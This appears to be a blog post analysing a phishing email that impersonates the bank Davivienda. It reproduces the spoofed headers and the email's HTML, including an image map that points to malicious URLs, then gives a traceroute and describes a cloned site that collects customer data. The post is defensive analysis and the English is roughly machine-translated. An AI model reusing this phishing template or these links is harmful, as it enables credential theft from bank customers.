Technical analysis of phishing.

What is phishing? 

 

Phishing is a way of attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

 

Source ( http://en.wikipedia.org/wiki/Phishing )

Today we will discuss an email received by our customers, who shared the information with us to analyze and publish.

Although anti-phishing tools hotmail system alert the problem, the fraudulent message is received in the inbox of the user, which in the hands of an inexperienced user could fall into the trap.

By clicking on the option Show the contents began to review point by point how they operate and how these fraudulent emails are taking over private information from unsuspecting users without local authorities in affected countries do not intervene and global Internet entities.

In reviewing the source code of the email using the option described in the following image verifies that the email download an image hosted on a compromised web server.

 

Subject: Davivienda S.A

From: Cuenta Bloqueada<Davivienda@eltiempo.com>

MIME-Version: 1.0

Content-Type: text/html; charset=»iso-8859-1″

X-Priority: 1 (Higuest)

X-MSMail-Priority: High

Importance: normal

Reply-To: Davivienda@eltiempo.com

Return-Path: ceetusr@eltiempo.com

X-OriginalArrivalTime: 15 May 2012 04:14:11.0812 (UTC) FILETIME=[2E899240:01CD3251]

<html>

<body>

<center>

 <p>Para visualizar correctamente este correo haga clic en mostrar imagenes</p>

  <p><img src=»http://www.grodcoconcesiones.com.co/imagenesadministrador/Mensaje.jpg» border=»0″ usemap=»#Map»>

    <map name=»Map» id=»Map»>

      <area shape=»rect» coords=»228,698,400,779″ href=»http://222.128.6.141/index.html» />

      <area shape=»rect» coords=»322,831,357,859″ href=»http://222.128.6.141/index.html» />

    </map>  

  </p>

</center>

</body>

</html>

 

Additionally, the email has originated from the servers described herein; 

x-store-info:sbevkl2QZR7OXo7WID5ZcVBK1Phj2jX/

Authentication-Results: hotmail.com; sender-id=softfail (sender IP is 200.41.9.251) header.from=Davivienda@eltiempo.com; dkim=none header.d=eltiempo.com; x-hmca=fail

X-SID-PRA: Davivienda@eltiempo.com

X-SID-Result: SoftFail

X-DKIM-Result: None

X-Message-Status: s1:0:n

X-AUTH-Result: FAIL

X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MTtHRD0xO1NDTD0y

X-Message-Info: NhFq/7gR1vQ8HYpTTD73yxNCczFurQ1xl5Wx1KDl5JdU2JZGGu+QKweE0n5pwLQ/EIUKpwAu87lyM/lusPyIJz2M1M9CeHlEJnQUVL1eBoo8c9ZJf80WTvFkpc9rzLFIGQ59pkq1EvzsjpijgUOYPw==

Received: from ceetmail.eltiempo.com ([200.41.9.251]) by SNT0-MC2-F44.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);

This image is hosted on an Internet server of the ZMB road concession of Bucaramanga Colombia, probably the administrator of this site is not aware of what is staying far your site has been compromised.

Using a map of HTML program that can click on the downloaded image accessing a web server whose address is located in China:

<map name=»Map» id=»Map»>

<area shape=»rect» coords=»228,698,400,779″ href=»http://222.128.6.141/index.html» />

<area shape=»rect» coords=»322,831,357,859″ href=»http://222.128.6.141/index.html» />

    </map>

TraceRoute to 222.128.6.141

Hop

(ms)

(ms)

(ms)

 

     IP Address

Host name

 

  20 

  0 

  0 

     8.9.232.73

 xe-5-3-0.edge3.dallas1.level3.net  

 

  1 

  1 

  1 

     4.69.145.76

 ae-2-70.edge2.dallas3.level3.net  

 

  5 

  4 

  4 

     144.232.24.17

 sl-st30-dal-.sprintlink.net  

 

  5 

  5 

  4 

     144.232.25.189

  –  

 

  4 

  4 

  4 

     144.232.1.44

 sl-crs1-fw-0-7-0-0.sprintlink.net  

 

  40 

  42 

  41 

     144.232.25.159

 sl-crs1-ria-0-4-2-0.sprintlink.net  

 

  41 

  41 

  41 

     144.232.25.156

 sl-crs1-ana-0-10-0-0.sprintlink.net  

 

  40 

  40 

  40 

     144.232.0.37

 sl-gw29-ana-0-0-0.sprintlink.net  

 

  507 

  512 

  515 

     160.81.147.166

 sl-china6-1-0.sprintlink.net  

 

10 

  517 

  519 

  510 

     219.158.97.9

  –  

 

11 

  543 

  541 

  533 

     219.158.11.17

  –  

 

12 

  611 

  Timed out 

  610 

     219.158.4.157

  –  

 

13 

  598 

  576 

  574 

     123.126.0.74

  –  

 

14 

  596 

  584 

  590 

     124.65.56.154

  –  

 

15 

  Timed out 

  611 

  616 

     61.148.163.222

  –  

 

16 

  604 

  Timed out 

  580 

     222.128.6.141

  –  

Trace complete

When the page loads index.html 222.128.6.141 server downloads the page is hosted on the server hosting mix58fm.com which is in the U.S. on behalf of Rhode Alexander . lights1@adelphia.net.

 

 

The site has exactly the same appearance of the original site of http://www.davivienda.com, which is achieved using the copy tool HTTrack Website Copier / 3 ( http://www.httrack.com )

Upon entering the site are captured customer data and seeks to close the window.

It may seem highly unlikely that anyone fall for these places, but is more common than believed.

{youtube}7a7rwM4e6W4{/youtube}